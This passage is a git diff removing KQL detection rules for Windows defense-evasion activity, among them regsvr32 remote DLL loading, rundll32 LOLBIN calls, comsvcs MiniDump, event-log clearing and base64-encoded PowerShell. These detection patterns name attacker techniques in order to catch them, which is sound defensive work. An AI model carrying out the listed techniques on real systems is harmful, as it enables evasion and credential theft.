ProcessCommandLine contains "\\AppData\\Local\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_Cabinet_File_Expansion.kql b/Defense Evasion/Potentially_Suspicious_Cabinet_File_Expansion.kql
deleted file mode 100644
index ca49b897..00000000
--- a/Defense Evasion/Potentially_Suspicious_Cabinet_File_Expansion.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Bhabesh Raj, X__Junior (Nextron Systems)
-// Date: 2021/07/30
-// Level: medium
-// Description: Detects the expansion or decompression of cabinet files from potentially suspicious or uncommon locations, e.g. seen in Iranian MeteorExpress related attacks
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "-F:" or ProcessCommandLine contains "/F:") and FolderPath endswith "\\expand.exe") and ((ProcessCommandLine contains ":\\Perflogs\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains "\\Temporary Internet" or ProcessCommandLine contains ":\\ProgramData" or ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\AppData\\Roaming\\Temp" or ProcessCommandLine contains ":\\Windows\\Temp") or ((ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favorites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favourites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Contacts\\"))) and (not((ProcessCommandLine contains "C:\\ProgramData\\Dell\\UpdateService\\Temp\\" and InitiatingProcessFolderPath =~ "C:\\Program Files (x86)\\Dell\\UpdateService\\ServiceShell.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_Call_To_Win32_NTEventlogFile_Class.kql b/Defense Evasion/Potentially_Suspicious_Call_To_Win32_NTEventlogFile_Class.kql
deleted file mode 100644
index 08972048..00000000
--- a/Defense Evasion/Potentially_Suspicious_Call_To_Win32_NTEventlogFile_Class.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/07/13
-// Level: high
-// Description: Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where ProcessCommandLine contains "Win32_NTEventlogFile" and (ProcessCommandLine contains ".BackupEventlog(" or ProcessCommandLine contains ".ChangeSecurityPermissions(" or ProcessCommandLine contains ".ChangeSecurityPermissionsEx(" or ProcessCommandLine contains ".ClearEventLog(" or ProcessCommandLine contains ".Delete(" or ProcessCommandLine contains ".DeleteEx(" or ProcessCommandLine contains ".Rename(" or ProcessCommandLine contains ".TakeOwnerShip(" or ProcessCommandLine contains ".TakeOwnerShipEx(")
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_Child_Process_Of_ClickOnce_Application.kql b/Defense Evasion/Potentially_Suspicious_Child_Process_Of_ClickOnce_Application.kql
deleted file mode 100644
index 25ef6289..00000000
--- a/Defense Evasion/Potentially_Suspicious_Child_Process_Of_ClickOnce_Application.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/06/12
-// Level: medium
-// Description: Detects potentially suspicious child processes of a ClickOnce deployment application
-// Tags: attack.execution, attack.defense_evasion
-DeviceProcessEvents
-| where (FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\explorer.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\werfault.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath contains "\\AppData\\Local\\Apps\\2.0\\"
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_Child_Process_Of_DiskShadow.EXE.kql b/Defense Evasion/Potentially_Suspicious_Child_Process_Of_DiskShadow.EXE.kql
deleted file mode 100644
index d3abfa67..00000000
--- a/Defense Evasion/Potentially_Suspicious_Child_Process_Of_DiskShadow.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/09/15
-// Level: medium
-// Description: Detects potentially suspicious child processes of "Diskshadow.exe". This could be an attempt to bypass parent/child relationship detection or application whitelisting rules.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\diskshadow.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_Child_Process_Of_Regsvr32.kql b/Defense Evasion/Potentially_Suspicious_Child_Process_Of_Regsvr32.kql
deleted file mode 100644
index f5e4d204..00000000
--- a/Defense Evasion/Potentially_Suspicious_Child_Process_Of_Regsvr32.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/05/05
-// Level: high
-// Description: Detects potentially suspicious child processes of "regsvr32.exe".
-// Tags: attack.defense_evasion, attack.t1218.010
-DeviceProcessEvents
-| where ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\explorer.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\werfault.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\regsvr32.exe") and (not((ProcessCommandLine contains " -u -p " and FolderPath endswith "\\werfault.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_Child_Process_Of_VsCode.kql b/Defense Evasion/Potentially_Suspicious_Child_Process_Of_VsCode.kql
deleted file mode 100644
index 4dc7fab5..00000000
--- a/Defense Evasion/Potentially_Suspicious_Child_Process_Of_VsCode.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/26
-// Level: medium
-// Description: Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.
-// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\code.exe" and (((ProcessCommandLine contains "Invoke-Expressions" or ProcessCommandLine contains "IEX" or ProcessCommandLine contains "Invoke-Command" or ProcessCommandLine contains "ICM" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe")) or (FolderPath endswith "\\calc.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\Temp\\"))
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_Child_Process_of_KeyScrambler.exe.kql b/Defense Evasion/Potentially_Suspicious_Child_Process_of_KeyScrambler.exe.kql
deleted file mode 100644
index a30d1353..00000000
--- a/Defense Evasion/Potentially_Suspicious_Child_Process_of_KeyScrambler.exe.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2024/05/13
-// Level: medium
-// Description: Detects potentially suspicious child processes of KeyScrambler.exe
-// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1203, attack.t1574.002
-DeviceProcessEvents
-| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "mshta.exe", "PowerShell.EXE", "pwsh.dll", "regsvr32.exe", "RUNDLL32.EXE", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\KeyScrambler.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_DLL_Registered_Via_Odbcconf.EXE.kql b/Defense Evasion/Potentially_Suspicious_DLL_Registered_Via_Odbcconf.EXE.kql
deleted file mode 100644
index a5a3cf74..00000000
--- a/Defense Evasion/Potentially_Suspicious_DLL_Registered_Via_Odbcconf.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/22
-// Level: high
-// Description: Detects execution of "odbcconf" with the "REGSVR" action where the DLL in question doesn't contain a ".dll" extension. Which is often used as a method to evade defenses.
-// Tags: attack.defense_evasion, attack.t1218.008
-DeviceProcessEvents
-| where (ProcessCommandLine contains "REGSVR " and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe")) and (not(ProcessCommandLine contains ".dll"))
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_Desktop_Background_Change_Using_Reg.EXE.kql b/Defense Evasion/Potentially_Suspicious_Desktop_Background_Change_Using_Reg.EXE.kql
deleted file mode 100644
index 04a1ecbd..00000000
--- a/Defense Evasion/Potentially_Suspicious_Desktop_Background_Change_Using_Reg.EXE.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Stephen Lincoln @slincoln-aiq (AttackIQ)
-// Date: 2023/12/21
-// Level: medium
-// Description: Detects the execution of "reg.exe" to alter registry keys that would replace the user's desktop background.
-This is a common technique used by malware to change the desktop background to a ransom note or other image.
-
-// Tags: attack.defense_evasion, attack.impact, attack.t1112, attack.t1491.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "add" and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) and (ProcessCommandLine contains "Control Panel\\Desktop" or ProcessCommandLine contains "CurrentVersion\\Policies\\ActiveDesktop" or ProcessCommandLine contains "CurrentVersion\\Policies\\System") and ((ProcessCommandLine contains "/v NoChangingWallpaper" and ProcessCommandLine contains "/d 1") or (ProcessCommandLine contains "/v Wallpaper" and ProcessCommandLine contains "/t REG_SZ") or (ProcessCommandLine contains "/v WallpaperStyle" and ProcessCommandLine contains "/d 2"))
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_Desktop_Background_Change_Via_Registry.kql b/Defense Evasion/Potentially_Suspicious_Desktop_Background_Change_Via_Registry.kql
deleted file mode 100644
index ea293a77..00000000
--- a/Defense Evasion/Potentially_Suspicious_Desktop_Background_Change_Via_Registry.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Stephen Lincoln @slincoln-aiq (AttackIQ)
-// Date: 2023/12/21
-// Level: medium
-// Description: Detects regsitry value settings that would replace the user's desktop background.
-This is a common technique used by malware to change the desktop background to a ransom note or other image.
-
-// Tags: attack.defense_evasion, attack.impact, attack.t1112, attack.t1491.001
-DeviceRegistryEvents
-| where (RegistryKey contains "Control Panel\\Desktop" or RegistryKey contains "CurrentVersion\\Policies\\ActiveDesktop" or RegistryKey contains "CurrentVersion\\Policies\\System") and ((RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "NoChangingWallpaper") or RegistryKey endswith "\\Wallpaper" or (RegistryValueData =~ "2" and RegistryKey endswith "\\WallpaperStyle")) and (not(InitiatingProcessFolderPath endswith "\\svchost.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_Event_Viewer_Child_Process.kql b/Defense Evasion/Potentially_Suspicious_Event_Viewer_Child_Process.kql
deleted file mode 100644
index 0897182f..00000000
--- a/Defense Evasion/Potentially_Suspicious_Event_Viewer_Child_Process.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2017/03/19
-// Level: high
-// Description: Detects uncommon or suspicious child processes of "eventvwr.exe" which might indicate a UAC bypass attempt
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, car.2019-04-001
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\eventvwr.exe" and (not((FolderPath endswith ":\\Windows\\System32\\mmc.exe" or FolderPath endswith ":\\Windows\\System32\\WerFault.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\WerFault.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_GoogleUpdate_Child_Process.kql b/Defense Evasion/Potentially_Suspicious_GoogleUpdate_Child_Process.kql
deleted file mode 100644
index 1175f08b..00000000
--- a/Defense Evasion/Potentially_Suspicious_GoogleUpdate_Child_Process.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/15
-// Level: high
-// Description: Detects potentially suspicious child processes of "GoogleUpdate.exe"
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\GoogleUpdate.exe" and (not((isnull(FolderPath) or (FolderPath contains "\\Google" or (FolderPath endswith "\\setup.exe" or FolderPath endswith "chrome_updater.exe" or FolderPath endswith "chrome_installer.exe")))))
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_Office_Document_Executed_From_Trusted_Location.kql b/Defense Evasion/Potentially_Suspicious_Office_Document_Executed_From_Trusted_Location.kql
deleted file mode 100644
index 1babab4d..00000000
--- a/Defense Evasion/Potentially_Suspicious_Office_Document_Executed_From_Trusted_Location.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/06/21
-// Level: high
-// Description: Detects the execution of an Office application that points to a document that is located in a trusted location. Attackers often used this to avoid macro security and execute their malicious code.
-// Tags: attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where (((FolderPath endswith "\\EXCEL.EXE" or FolderPath endswith "\\POWERPNT.EXE" or FolderPath endswith "\\WINWORD.exe") or (ProcessVersionInfoOriginalFileName in~ ("Excel.exe", "POWERPNT.EXE", "WinWord.exe"))) and (InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\dopus.exe") and (ProcessCommandLine contains "\\AppData\\Roaming\\Microsoft\\Templates" or ProcessCommandLine contains "\\AppData\\Roaming\\Microsoft\\Word\\Startup\\" or ProcessCommandLine contains "\\Microsoft Office\\root\\Templates\\" or ProcessCommandLine contains "\\Microsoft Office\\Templates\\")) and (not((ProcessCommandLine endswith ".dotx" or ProcessCommandLine endswith ".xltx" or ProcessCommandLine endswith ".potx")))
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_Regsvr32_HTTP_IP_Pattern.kql b/Defense Evasion/Potentially_Suspicious_Regsvr32_HTTP_IP_Pattern.kql
deleted file mode 100644
index 60ec888b..00000000
--- a/Defense Evasion/Potentially_Suspicious_Regsvr32_HTTP_IP_Pattern.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/01/11
-// Level: high
-// Description: Detects regsvr32 execution to download and install DLLs located remotely where the address is an IP address.
-// Tags: attack.defense_evasion, attack.t1218.010
-DeviceProcessEvents
-| where (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") and (ProcessCommandLine contains " /i:http://1" or ProcessCommandLine contains " /i:http://2" or ProcessCommandLine contains " /i:http://3" or ProcessCommandLine contains " /i:http://4" or ProcessCommandLine contains " /i:http://5" or ProcessCommandLine contains " /i:http://6" or ProcessCommandLine contains " /i:http://7" or ProcessCommandLine contains " /i:http://8" or ProcessCommandLine contains " /i:http://9" or ProcessCommandLine contains " /i:https://1" or ProcessCommandLine contains " /i:https://2" or ProcessCommandLine contains " /i:https://3" or ProcessCommandLine contains " /i:https://4" or ProcessCommandLine contains " /i:https://5" or ProcessCommandLine contains " /i:https://6" or ProcessCommandLine contains " /i:https://7" or ProcessCommandLine contains " /i:https://8" or ProcessCommandLine contains " /i:https://9" or ProcessCommandLine contains " -i:http://1" or ProcessCommandLine contains " -i:http://2" or ProcessCommandLine contains " -i:http://3" or ProcessCommandLine contains " -i:http://4" or ProcessCommandLine contains " -i:http://5" or ProcessCommandLine contains " -i:http://6" or ProcessCommandLine contains " -i:http://7" or ProcessCommandLine contains " -i:http://8" or ProcessCommandLine contains " -i:http://9" or ProcessCommandLine contains " -i:https://1" or ProcessCommandLine contains " -i:https://2" or ProcessCommandLine contains " -i:https://3" or ProcessCommandLine contains " -i:https://4" or ProcessCommandLine contains " -i:https://5" or ProcessCommandLine contains " -i:https://6" or ProcessCommandLine contains " -i:https://7" or ProcessCommandLine contains " -i:https://8" or ProcessCommandLine contains " -i:https://9")
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_Rundll32_Activity.kql b/Defense Evasion/Potentially_Suspicious_Rundll32_Activity.kql
deleted file mode 100644
index ba699c24..00000000
--- a/Defense Evasion/Potentially_Suspicious_Rundll32_Activity.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/01/16
-// Level: medium
-// Description: Detects suspicious execution of rundll32, with specific calls to some DLLs with known LOLBIN functionalities
-// Tags: attack.defense_evasion, attack.t1218.011
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "javascript:" and ProcessCommandLine contains ".RegisterXLL") or (ProcessCommandLine contains "url.dll" and ProcessCommandLine contains "OpenURL") or (ProcessCommandLine contains "url.dll" and ProcessCommandLine contains "OpenURLA") or (ProcessCommandLine contains "url.dll" and ProcessCommandLine contains "FileProtocolHandler") or (ProcessCommandLine contains "zipfldr.dll" and ProcessCommandLine contains "RouteTheCall") or (ProcessCommandLine contains "shell32.dll" and ProcessCommandLine contains "Control_RunDLL") or (ProcessCommandLine contains "shell32.dll" and ProcessCommandLine contains "ShellExec_RunDLL") or (ProcessCommandLine contains "mshtml.dll" and ProcessCommandLine contains "PrintHTML") or (ProcessCommandLine contains "advpack.dll" and ProcessCommandLine contains "LaunchINFSection") or (ProcessCommandLine contains "advpack.dll" and ProcessCommandLine contains "RegisterOCX") or (ProcessCommandLine contains "ieadvpack.dll" and ProcessCommandLine contains "LaunchINFSection") or (ProcessCommandLine contains "ieadvpack.dll" and ProcessCommandLine contains "RegisterOCX") or (ProcessCommandLine contains "ieframe.dll" and ProcessCommandLine contains "OpenURL") or (ProcessCommandLine contains "shdocvw.dll" and ProcessCommandLine contains "OpenURL") or (ProcessCommandLine contains "syssetup.dll" and ProcessCommandLine contains "SetupInfObjectInstallAction") or (ProcessCommandLine contains "setupapi.dll" and ProcessCommandLine contains "InstallHinfSection") or (ProcessCommandLine contains "pcwutl.dll" and ProcessCommandLine contains "LaunchApplication") or (ProcessCommandLine contains "dfshim.dll" and ProcessCommandLine contains "ShOpenVerbApplication") or (ProcessCommandLine contains "dfshim.dll" and ProcessCommandLine contains "ShOpenVerbShortcut") or (ProcessCommandLine contains "scrobj.dll" and ProcessCommandLine contains "GenerateTypeLib" and ProcessCommandLine contains "http") or (ProcessCommandLine contains "shimgvw.dll" and ProcessCommandLine contains "ImageView_Fullscreen" and ProcessCommandLine contains "http") or (ProcessCommandLine contains "comsvcs.dll" and ProcessCommandLine contains "MiniDump")) and (not((((ProcessCommandLine contains "Shell32.dll" and ProcessCommandLine contains "Control_RunDLL" and ProcessCommandLine contains ".cpl") and InitiatingProcessCommandLine contains ".cpl" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\control.exe") or ProcessCommandLine contains "shell32.dll,Control_RunDLL desk.cpl,screensaver,@screensaver" or (ProcessCommandLine endswith ".cpl\"," and ProcessCommandLine startswith "\"C:\\Windows\\system32\\rundll32.exe\" Shell32.dll,Control_RunDLL \"C:\\Windows\\System32\\" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\control.exe"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_Windows_App_Activity.kql b/Defense Evasion/Potentially_Suspicious_Windows_App_Activity.kql
deleted file mode 100644
index 7508341f..00000000
--- a/Defense Evasion/Potentially_Suspicious_Windows_App_Activity.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/12
-// Level: medium
-// Description: Detects potentially suspicious child process of applications launched from inside the WindowsApps directory. This could be a sign of a rogue ".appx" package installation/execution
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\" and ((ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "Base64") or (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe")) and (not(((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\pwsh.exe") and InitiatingProcessFolderPath contains ":\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal" and InitiatingProcessFolderPath endswith "\\WindowsTerminal.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_Wuauclt_Network_Connection.kql b/Defense Evasion/Potentially_Suspicious_Wuauclt_Network_Connection.kql
deleted file mode 100644
index 7b6fc83b..00000000
--- a/Defense Evasion/Potentially_Suspicious_Wuauclt_Network_Connection.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/10/12
-// Level: medium
-// Description: Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making network connections.
-One could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.
-
-// Tags: attack.defense_evasion, attack.t1218
-DeviceNetworkEvents
-| where (InitiatingProcessCommandLine contains " /RunHandlerComServer" and InitiatingProcessFolderPath contains "wuauclt") and (not((InitiatingProcessCommandLine =~ "" or isnull(InitiatingProcessCommandLine) or (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) or (ipv4_is_in_range(RemoteIP, "20.184.0.0/13") or ipv4_is_in_range(RemoteIP, "20.192.0.0/10") or ipv4_is_in_range(RemoteIP, "23.79.0.0/16") or ipv4_is_in_range(RemoteIP, "51.10.0.0/15") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/15") or ipv4_is_in_range(RemoteIP, "52.224.0.0/11")) or (InitiatingProcessCommandLine contains ":\\Windows\\UUS\\Packages\\Preview\\amd64\\updatedeploy.dll /ClassId" or InitiatingProcessCommandLine contains ":\\Windows\\UUS\\amd64\\UpdateDeploy.dll /ClassId") or (InitiatingProcessCommandLine contains ":\\Windows\\WinSxS\\" and InitiatingProcessCommandLine contains "\\UpdateDeploy.dll /ClassId "))))
\ No newline at end of file
diff --git a/Defense Evasion/PowerShell_Base64_Encoded_FromBase64String_Cmdlet.kql b/Defense Evasion/PowerShell_Base64_Encoded_FromBase64String_Cmdlet.kql
deleted file mode 100644
index e2931fc4..00000000
--- a/Defense Evasion/PowerShell_Base64_Encoded_FromBase64String_Cmdlet.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/08/24
-// Level: high
-// Description: Detects usage of a base64 encoded "FromBase64String" cmdlet in a process command line
-// Tags: attack.defense_evasion, attack.t1140, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "OjpGcm9tQmFzZTY0U3RyaW5n" or ProcessCommandLine contains "o6RnJvbUJhc2U2NFN0cmluZ" or ProcessCommandLine contains "6OkZyb21CYXNlNjRTdHJpbm" or (ProcessCommandLine contains "OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA" or ProcessCommandLine contains "oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA" or ProcessCommandLine contains "6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw")
\ No newline at end of file
diff --git a/Defense Evasion/PowerShell_Base64_Encoded_Invoke_Keyword.kql b/Defense Evasion/PowerShell_Base64_Encoded_Invoke_Keyword.kql
deleted file mode 100644
index be3160c2..00000000
--- a/Defense Evasion/PowerShell_Base64_Encoded_Invoke_Keyword.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t
-// Date: 2022/05/20
-// Level: high
-// Description: Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls
-// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1027
-DeviceProcessEvents
-| where ProcessCommandLine contains " -e" and (ProcessCommandLine contains "SQBuAHYAbwBrAGUALQ" or ProcessCommandLine contains "kAbgB2AG8AawBlAC0A" or ProcessCommandLine contains "JAG4AdgBvAGsAZQAtA" or ProcessCommandLine contains "SW52b2tlL" or ProcessCommandLine contains "ludm9rZS" or ProcessCommandLine contains "JbnZva2Ut") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/Defense Evasion/PowerShell_Base64_Encoded_Reflective_Assembly_Load.kql b/Defense Evasion/PowerShell_Base64_Encoded_Reflective_Assembly_Load.kql
deleted file mode 100644
index 7b67f975..00000000
--- a/Defense Evasion/PowerShell_Base64_Encoded_Reflective_Assembly_Load.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems), pH-T (Nextron Systems)
-// Date: 2022/03/01
-// Level: high
-// Description: Detects base64 encoded .NET reflective loading of Assembly
-// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1027, attack.t1620
-DeviceProcessEvents
-| where ProcessCommandLine contains "WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA" or ProcessCommandLine contains "sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA" or ProcessCommandLine contains "bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA" or ProcessCommandLine contains "AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC" or ProcessCommandLine contains "BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp" or ProcessCommandLine contains "AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK" or ProcessCommandLine contains "WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ" or ProcessCommandLine contains "sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA" or ProcessCommandLine contains "bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA" or ProcessCommandLine contains "WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA" or ProcessCommandLine contains "sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA" or ProcessCommandLine contains 